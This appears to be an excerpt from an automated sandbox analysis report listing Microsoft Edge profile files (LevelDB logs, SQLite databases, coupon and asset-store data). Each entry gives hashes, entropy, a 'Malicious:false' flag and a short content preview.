                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):313
                                                                                                                                                                                                                                                                  Entropy (8bit):5.210125411933599
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPyEs1N723oH+Tcwtp3hBtB2KLlpoPpBmq2PN723oH+Tcwtp3hBWsIFUv:7faYebp3dFLT8mvVaYebp3eFUv
                                                                                                                                                                                                                                                                  MD5:4C0BEFB120E29C7BB988028CBDF7FAB7
                                                                                                                                                                                                                                                                  SHA1:CE43A4FE8C11EF62053E14A88449BFD928DAF131
                                                                                                                                                                                                                                                                  SHA-256:DD9E4084A1E8C6053B709FAD37987478B85EF139759A60CBE24145E61B321822
                                                                                                                                                                                                                                                                  SHA-512:DA5161849EE0E19CBAAA05E46BBF2A22AA5D808D66B4CE3D9D99CC439870B8B62685BE5977CE836E17AD3E02AA7930DA773E9BB4B9B24515670507DADD61AC03
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:29.140 1d00 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/19-07:44:29.169 1d00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                                                                  Entropy (8bit):5.222863164126652
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24576:IbPMZpV8fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpV8fx2mjF
                                                                                                                                                                                                                                                                  MD5:DDE73345475E1AA529C648A5AC16425D
                                                                                                                                                                                                                                                                  SHA1:4A39D6170ABA957B423E1A94D786AA7A573A4D9A
                                                                                                                                                                                                                                                                  SHA-256:5D9A0DBE5DAE1D8B917A683CC42CE7C3438ED856C07241A9D0FD92D67B354421
                                                                                                                                                                                                                                                                  SHA-512:7D3CF33113D5E964047D2A49A130D13DB829D6A261C8E39C077D49FC2A60A307D46845BE6CED24B73A7C653AB8D19D4C406E63B29005886AA8D8923D5D9B5FC2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                                                  Entropy (8bit):5.107472446101514
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPWq2PN723oH+Tcwt9Eh1tIFUt8OoPsZmw+OoPoUDkwON723oH+Tcwt9Eh15LJ:7RvVaYeb9Eh16FUt8Ov/+OC5OaYeb9Er
                                                                                                                                                                                                                                                                  MD5:91BDE65EF831A3691C81F0B9C3C9FA53
                                                                                                                                                                                                                                                                  SHA1:E9F5943FECF7230E12BDC24EFE4972610124204A
                                                                                                                                                                                                                                                                  SHA-256:B6B963B20A6BCB1D3DE913E1E037309A98333CDAEF2C4E652683FB7AFABFD3DF
                                                                                                                                                                                                                                                                  SHA-512:FDFE541DEF4CF7F0ED92D1D5930AA3BF1A1555D14BD878E01763803150F0E8BE609A1B6A4C2A3C0965BC770273D83D17ECD7FAEEB1A0158F596F1632D3E96E29
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:29.016 22f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-07:44:29.017 22f4 Recovering log #3.2024/12/19-07:44:29.025 22f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                                                  Entropy (8bit):5.107472446101514
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPWq2PN723oH+Tcwt9Eh1tIFUt8OoPsZmw+OoPoUDkwON723oH+Tcwt9Eh15LJ:7RvVaYeb9Eh16FUt8Ov/+OC5OaYeb9Er
                                                                                                                                                                                                                                                                  MD5:91BDE65EF831A3691C81F0B9C3C9FA53
                                                                                                                                                                                                                                                                  SHA1:E9F5943FECF7230E12BDC24EFE4972610124204A
                                                                                                                                                                                                                                                                  SHA-256:B6B963B20A6BCB1D3DE913E1E037309A98333CDAEF2C4E652683FB7AFABFD3DF
                                                                                                                                                                                                                                                                  SHA-512:FDFE541DEF4CF7F0ED92D1D5930AA3BF1A1555D14BD878E01763803150F0E8BE609A1B6A4C2A3C0965BC770273D83D17ECD7FAEEB1A0158F596F1632D3E96E29
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:29.016 22f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-07:44:29.017 22f4 Recovering log #3.2024/12/19-07:44:29.025 22f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                                  Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                  MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                  SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                  SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                  SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                  Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                  MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                  SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                  SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                  SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):635202
                                                                                                                                                                                                                                                                  Entropy (8bit):6.015641405985325
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:dmaP2W8JQiCtQ9/IQW8bvw7kFz8PbIfKGnzPjPMK56nQuda:d158g6DikFwPbW3MKwk
                                                                                                                                                                                                                                                                  MD5:3E60FDAC028F69F488D6EF5351BED25C
                                                                                                                                                                                                                                                                  SHA1:470E51D9455EBD53E982A9BBD87139A1960A0211
                                                                                                                                                                                                                                                                  SHA-256:AA2CD346CEC310F39A942459E1EF0974033D7107CC937B25F08BCC721E502575
                                                                                                                                                                                                                                                                  SHA-512:F1C57BB5F40721752079019DA68F71E142CFFF0A8BEB846CA24FED61FACFBCB6B3C7132A2AECBDACFEC4526B89EBFA0DE2B17FF13A208804FAF1E12D92811D79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1..l..................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3759820,"primeBases":[5381,5381,5381,5381],"supportedDomains":"GFf64FMwbTXONwpTKw8NswCMcDsTVutudxdC2VBNvqhRP5f8uIpOCpOEQF8P1FwhE/L5zzVDFUhlVkAyNg+QuR5AdfrHMaGmUYmGNsEWYR3+DcNBpZ/I5Kibhl4YVjThBkPcIOC9odU2mFrQP1mAq7X/iiSahqI2Dpcr7UQx3fiFGc+G7XS3ADWuanE3R+gk9baykePz1ufouCz2G6MEEPn8bWcpcyUh9W8HVj78wJDg545r3xfqy9Eyybv1AY7wk5NysoFumawShyBUcAfG+SahV7VCYKy5zIPNyoCeHT7RoaXGBpNlEkGeEz1pYIKUGda3nlWrAEwSDzlhgehpJ/X1Rp9tYqpwf38kC6BMCxZCRL4z6g5SdaGqv5ivcLrieLvK2t+5NxWiDNhU+IvXTnVlWeGTn2T95gH+7lnN+XRyxA1bm2H2t7/ZXMQPghA+jmq1JXjNEEY7ZygGMT6g8AJP+eKF+uMA9nLdAKgqMWaAEIEHpe6cVu9h33kKHDUc4YBhOqRQmDMW5E6AMOPT/pEyBLKjkj1WvRlUFemwOegxLnKlu8WdpyNChIXAZh5ssx4XScADAB8JF4uenIqZ/8VqvDWcj/EO28Kg/hdaq5AdTOkxN5+g+VcYlQjtUvp9wec76PnYAi073dVfe0LdOoZtneuxu0WHqemOudoq5KjhkrnMV21rCBsiksEM6oueFQz7/UD9LKDYqAE7eN5pdP6Isz+ByLpm5GWLTZxK5E1r3UAC/bHUgnXDo22YLMiIEVmkLwXS2Vxykqczr6CUDolW/WRvObO/vpH

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):142
                                                                                                                                                                                                                                                                  Entropy (8bit):5.076974137202359
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:gmX38E28xp4m3rscUSW1y27J4lf+nETPxpK2x7L8KFFb5FBFUt+Fxn:gmX38D8xSEsITCJ4+n0PxEWHFpbBut+L
                                                                                                                                                                                                                                                                  MD5:202BE89FAED70FC95C7C0735A4AD7F03
                                                                                                                                                                                                                                                                  SHA1:17D9D0AF620FBBE1EF77AAD3CAD53088AC653B68
                                                                                                                                                                                                                                                                  SHA-256:DB5084729AAAB4A37737353313BBF533125F395D4B96025C198A8FF7454528A5
                                                                                                                                                                                                                                                                  SHA-512:8D7C6E50F7317813955CD1ED12BC20BAA4C928175987AF274738937D6FFEFA2F735D8CFA3C6C26AA69E01474752AF31C45A83271CF320268452C2ED292DD19D4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..$.9................BLOOM_FILTER_EXPIRY_TIME:.1734698676.714047....G................BLOOM_FILTER_LAST_MODIFIED:.Thu, 19 Dec 2024 12:02:45 GMT

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):635183
                                                                                                                                                                                                                                                                  Entropy (8bit):6.0150488963174
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:9maY2WDJQKCtP9/IQf8bvwrkHtePbPcKGncPjRQK5VnMNdo:91JPg7DgkHsPbSkQKK2
                                                                                                                                                                                                                                                                  MD5:1BDC22829D6B48F827D4A497D9211035
                                                                                                                                                                                                                                                                  SHA1:291802612BE131696D0CF8294F402AC4C357A377
                                                                                                                                                                                                                                                                  SHA-256:99D1BFA88799B53E1AD9EF6ABB1CF9985E8EA687632A63871844C65128CE6750
                                                                                                                                                                                                                                                                  SHA-512:81B9043179E4B02D3CCEAADB39002261396A3F21E8D509B4C619CE4D263DAB298DB52B7419BB1E94338232AA2EE1D16C6E91EE62791A66B5068692D82C5D6546
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3759820,"primeBases":[5381,5381,5381,5381],"supportedDomains":"GFf64FMwbTXONwpTKw8NswCMcDsTVutudxdC2VBNvqhRP5f8uIpOCpOEQF8P1FwhE/L5zzVDFUhlVkAyNg+QuR5AdfrHMaGmUYmGNsEWYR3+DcNBpZ/I5Kibhl4YVjThBkPcIOC9odU2mFrQP1mAq7X/iiSahqI2Dpcr7UQx3fiFGc+G7XS3ADWuanE3R+gk9baykePz1ufouCz2G6MEEPn8bWcpcyUh9W8HVj78wJDg545r3xfqy9Eyybv1AY7wk5NysoFumawShyBUcAfG+SahV7VCYKy5zIPNyoCeHT7RoaXGBpNlEkGeEz1pYIKUGda3nlWrAEwSDzlhgehpJ/X1Rp9tYqpwf38kC6BMCxZCRL4z6g5SdaGqv5ivcLrieLvK2t+5NxWiDNhU+IvXTnVlWeGTn2T95gH+7lnN+XRyxA1bm2H2t7/ZXMQPghA+jmq1JXjNEEY7ZygGMT6g8AJP+eKF+uMA9nLdAKgqMWaAEIEHpe6cVu9h33kKHDUc4YBhOqRQmDMW5E6AMOPT/pEyBLKjkj1WvRlUFemwOegxLnKlu8WdpyNChIXAZh5ssx4XScADAB8JF4uenIqZ/8VqvDWcj/EO28Kg/hdaq5AdTOkxN5+g+VcYlQjtUvp9wec76PnYAi073dVfe0LdOoZtneuxu0WHqemOudoq5KjhkrnMV21rCBsiksEM6oueFQz7/UD9LKDYqAE7eN5pdP6Isz+ByLpm5GWLTZxK5E1r3UAC/bHUgnXDo22YLMiIEVmkLwXS2Vxykqczr6CUDolW/WRvObO/vpHqRCZMFqXmSG6Abc4z8bIucyyzoYTXsuB6aaXR1pNRBl9

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):516
                                                                                                                                                                                                                                                                  Entropy (8bit):5.2490247051974075
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7pvVaYebn9GFUt8Om1/+Oo5OaYebn95Z9pB5VWf0TBCWfd+KOB/h7h:7VVaYeb9ig8OQyOaYeb9zLBLXTBC1B/X
                                                                                                                                                                                                                                                                  MD5:50465C64659728B50EE8E891A771CCAA
                                                                                                                                                                                                                                                                  SHA1:867890924765F4C554C8C09B35ABF6240ED21117
                                                                                                                                                                                                                                                                  SHA-256:17A7D633023835B0BCE2FA23DA718C41B4BC045C3193FEB76E69E57DC1B698D6
                                                                                                                                                                                                                                                                  SHA-512:B818AF0B7C167EB5CB087671ED6D17556DAC2788AA2CC3E4E79DD54A0540A6BF042CF66EB1312F579BA0CACF9B0EF0D4078634BDAF66326430C4CF6C95D55D64
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.519 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-07:44:23.520 1dc0 Recovering log #3.2024/12/19-07:44:23.520 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/19-07:44:36.759 1d04 Level-0 table #5: started.2024/12/19-07:44:36.802 1d04 Level-0 table #5: 635183 bytes OK.2024/12/19-07:44:36.809 1d04 Delete type=0 #3.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):516
                                                                                                                                                                                                                                                                  Entropy (8bit):5.2490247051974075
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7pvVaYebn9GFUt8Om1/+Oo5OaYebn95Z9pB5VWf0TBCWfd+KOB/h7h:7VVaYeb9ig8OQyOaYeb9zLBLXTBC1B/X
                                                                                                                                                                                                                                                                  MD5:50465C64659728B50EE8E891A771CCAA
                                                                                                                                                                                                                                                                  SHA1:867890924765F4C554C8C09B35ABF6240ED21117
                                                                                                                                                                                                                                                                  SHA-256:17A7D633023835B0BCE2FA23DA718C41B4BC045C3193FEB76E69E57DC1B698D6
                                                                                                                                                                                                                                                                  SHA-512:B818AF0B7C167EB5CB087671ED6D17556DAC2788AA2CC3E4E79DD54A0540A6BF042CF66EB1312F579BA0CACF9B0EF0D4078634BDAF66326430C4CF6C95D55D64
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.519 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-07:44:23.520 1dc0 Recovering log #3.2024/12/19-07:44:23.520 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/19-07:44:36.759 1d04 Level-0 table #5: started.2024/12/19-07:44:36.802 1d04 Level-0 table #5: 635183 bytes OK.2024/12/19-07:44:36.809 1d04 Delete type=0 #3.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                  Download File
